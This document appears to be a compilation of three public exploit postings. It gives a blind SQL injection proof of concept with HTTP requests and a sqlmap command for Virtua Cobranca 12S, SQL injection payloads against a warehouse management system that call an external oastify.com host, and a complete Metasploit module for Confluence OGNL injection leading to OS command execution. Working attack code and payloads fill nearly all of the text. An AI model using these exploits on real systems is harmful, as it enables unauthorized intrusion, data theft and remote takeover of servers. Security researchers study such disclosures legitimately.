<pre><code># Exploit Title: Virtua Software Cobranca 12S - SQLi<br /># Shodan Query: http.favicon.hash:876876147<br /># Date: 13/08/2021<br /># Exploit Author: Luca Regne<br /># Vendor Homepage: https://www.virtuasoftware.com.br/<br /># Software Link: https://www.virtuasoftware.com.br/downloads/Cobranca12S_13_08.exe<br /># Version: 12S<br /># Tested on: Windows Server 2019<br /># CVE : CVE-2021-37589<br />------------------------------------------------------------------------<br /><br /><br />## Description <br />A Blind SQL injection vulnerability in a Login Page (/controller/login.php) in Virtua Cobranca 12S version allows remote unauthenticated attackers to get information about application executing arbitrary SQL commands by idusuario parameter. <br /><br />## Request PoC<br />```<br />POST /controller/login.php?acao=autenticar HTTP/1.1<br />Host: redacted.com<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0<br />Accept: application/json, text/javascript, */*; q=0.01<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 37<br />Connection: close<br />Cookie: origem_selecionado=; PHPSESSID=<br /><br />idusuario='&idsenha=awesome_and_unprobaly_password&tipousr=Usuario<br /><br />```<br /><br />This request causes an error 500. Changing the idusuario to "'+AND+'1'%3d'1'--" the response to request was 200 status code with message of authentication error. <br /><br />```<br />POST /controller/login.php?acao=autenticar HTTP/1.1<br />Host: redacted.com<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0<br />Accept: application/json, text/javascript, */*; q=0.01<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 37<br />Connection: close<br />Cookie: origem_selecionado=; PHPSESSID=<br /><br />idusuario='+AND+'1'='1'--&idsenha=a&tipousr=Usuario<br /><br />```<br /><br />## Exploit<br />Save the request from burp to file <br />```bash<br />python3 sqlmap.py -r ~/req-virtua.txt -p idusuario --dbms firebird --level 5 --risk 3 --random-agent<br />```<br /><br /></code></pre>
<pre><code>## Title: Warehouse Management System 2022 ML-SQLi<br />## Author: nu11secur1ty<br />## Date: 06.13.2022<br />## Vendor: https://www.sourcecodester.com/users/tips23<br />## Software: https://www.sourcecodester.com/php-codeigniter-warehouse-management-system-free-source-code<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Warehouse-Management-System<br /><br /><br />## Description:<br />A Multiple SQLi exist in Warehouse Management System 2022 by oretnom23.<br />The attacker can retrieve all information from this system by using<br />this vulnerability.<br /><br />Status: TURBO CRITICAL<br /><br />[+] Payloads:<br /><br />```mysql<br />---<br />Parameter: cari (POST)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause (NOT)<br /> Payload: cari=(select<br />load_file('\\\\f4klvq2zr2jjq1fqicjzdovoifo8c3hr8twljb70.oastify.com\\qxv'))<br />OR NOT 4744=4744# IltN&kirim=<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or<br />GROUP BY clause (FLOOR)<br /> Payload: cari=(select<br />load_file('\\\\f4klvq2zr2jjq1fqicjzdovoifo8c3hr8twljb70.oastify.com\\qxv'))<br />OR (SELECT 9682 FROM(SELECT COUNT(*),CONCAT(0x71627a6a71,(SELECT<br />(ELT(9682=9682,1))),0x717a626a71,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)# mXqR&kirim=<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: cari=(select<br />load_file('\\\\f4klvq2zr2jjq1fqicjzdovoifo8c3hr8twljb70.oastify.com\\qxv'))<br />AND (SELECT 7785 FROM (SELECT(SLEEP(5)))LDxo)# ZbKb&kirim=<br /><br /> Type: UNION query<br /> Title: MySQL UNION query (NULL) - 9 columns<br /> Payload: cari=-5568 UNION ALL SELECT<br />CONCAT(0x71627a6a71,0x4856564e4357704e696c6b4648505a656a744575445967544a494d5075566b5a4d466c7976516869,0x717a626a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&kirim=<br />---<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Warehouse-Management-System)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/ef58wt)<br /><br /><br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /><br /> Rank = ExcellentRanking<br /><br /> prepend Msf::Exploit::Remote::AutoCheck<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::CmdStager<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Atlassian Confluence Namespace OGNL Injection',<br /> 'Description' => %q{<br /> This module exploits an OGNL injection in Atlassian Confluence servers. A specially crafted URI can be used to<br /> evaluate an OGNL expression resulting in OS command execution.<br /> },<br /> 'Author' => [<br /> 'Unknown', # exploited in the wild<br /> 'bturner-r7',<br /> 'jbaines-r7',<br /> 'Spencer McIntyre'<br /> ],<br /> 'References' => [<br /> ['CVE', '2021-26084'],<br /> ['URL', 'https://jira.atlassian.com/browse/CONFSERVER-79000?src=confmacro'],<br /> ['URL', 'https://gist.githubusercontent.com/bturner-r7/1d0b62fac85235b94f1c95cc4c03fcf3/raw/478e53b6f68b5150eefd53e0956f23d53618d250/confluence-exploit.py'],<br /> ['URL', 'https://github.com/jbaines-r7/through_the_wire'],<br /> ['URL', 'https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis']<br /> ],<br /> 'DisclosureDate' => '2022-06-02',<br /> 'License' => MSF_LICENSE,<br /> 'Platform' => ['unix', 'linux'],<br /> 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],<br /> 'Privileged' => false,<br /> 'Targets' => [<br /> [<br /> 'Unix Command',<br /> {<br /> 'Platform' => 'unix',<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :cmd<br /> }<br /> ],<br /> [<br /> 'Linux Dropper',<br /> {<br /> 'Platform' => 'linux',<br /> 'Arch' => [ARCH_X86, ARCH_X64],<br /> 'Type' => :dropper<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'DefaultOptions' => {<br /> 'RPORT' => 8090<br /> },<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /><br /> register_options([<br /> OptString.new('TARGETURI', [true, 'Base path', '/'])<br /> ])<br /> end<br /><br /> def check<br /> version = get_confluence_version<br /> return CheckCode::Unknown unless version<br /><br /> vprint_status("Detected Confluence version: #{version}")<br /> header = "X-#{Rex::Text.rand_text_alphanumeric(10..15)}"<br /> res = inject_ognl('', header: header) # empty command works for testing, the header will be set<br /><br /> return CheckCode::Unknown unless res<br /><br /> unless res && res.headers.include?(header)<br /> return CheckCode::Safe('Failed to test OGNL injection.')<br /> end<br /><br /> CheckCode::Vulnerable('Successfully tested OGNL injection.')<br /> end<br /><br /> def get_confluence_version<br /> return @confluence_version if @confluence_version<br /><br /> res = send_request_cgi(<br /> 'method' => 'GET',<br /> 'uri' => normalize_uri(target_uri.path, 'login.action')<br /> )<br /> return nil unless res&.code == 200<br /><br /> poweredby = res.get_xml_document.xpath('//ul[@id="poweredby"]/li[@class="print-only"]/text()').first&.text<br /> return nil unless poweredby =~ /Confluence (\d+(\.\d+)*)/<br /><br /> @confluence_version = Rex::Version.new(Regexp.last_match(1))<br /> @confluence_version<br /> end<br /><br /> def exploit<br /> print_status("Executing #{payload_instance.refname} (#{target.name})")<br /><br /> case target['Type']<br /> when :cmd<br /> execute_command(payload.encoded)<br /> when :dropper<br /> execute_cmdstager<br /> end<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> header = "X-#{Rex::Text.rand_text_alphanumeric(10..15)}"<br /> res = inject_ognl(cmd, header: header)<br /><br /> unless res && res.headers.include?(header)<br /> fail_with(Failure::PayloadFailed, "Failed to execute command: #{cmd}")<br /> end<br /><br /> vprint_good("Successfully executed command: #{cmd}")<br /> res.headers[header]<br /> end<br /><br /> def inject_ognl(cmd, header:)<br /> send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, Rex::Text.uri_encode(ognl_payload(cmd, header: header)), 'dashboard.action'),<br /> 'headers' => { header => cmd }<br /> )<br /> end<br /><br /> def ognl_payload(_cmd, header:)<br /> <<~OGNL.gsub(/^\s+/, '').tr("\n", '')<br /> ${<br /> Class.forName("com.opensymphony.webwork.ServletActionContext")<br /> .getMethod("getResponse",null)<br /> .invoke(null,null)<br /> .setHeader("#{header}",<br /> Class.forName("javax.script.ScriptEngineManager")<br /> .newInstance()<br /> .getEngineByName("js")<br /> .eval("java.lang.Runtime.getRuntime().exec([<br /> #{target['Platform'] == 'win' ? "'cmd.exe','/c'" : "'/bin/sh','-c'"},<br /> com.opensymphony.webwork.ServletActionContext.getRequest().getHeader('#{header}')<br /> ]); '#{Faker::Internet.uuid}'")<br /> )<br /> }<br /> OGNL<br /> end<br />end<br /></code></pre>
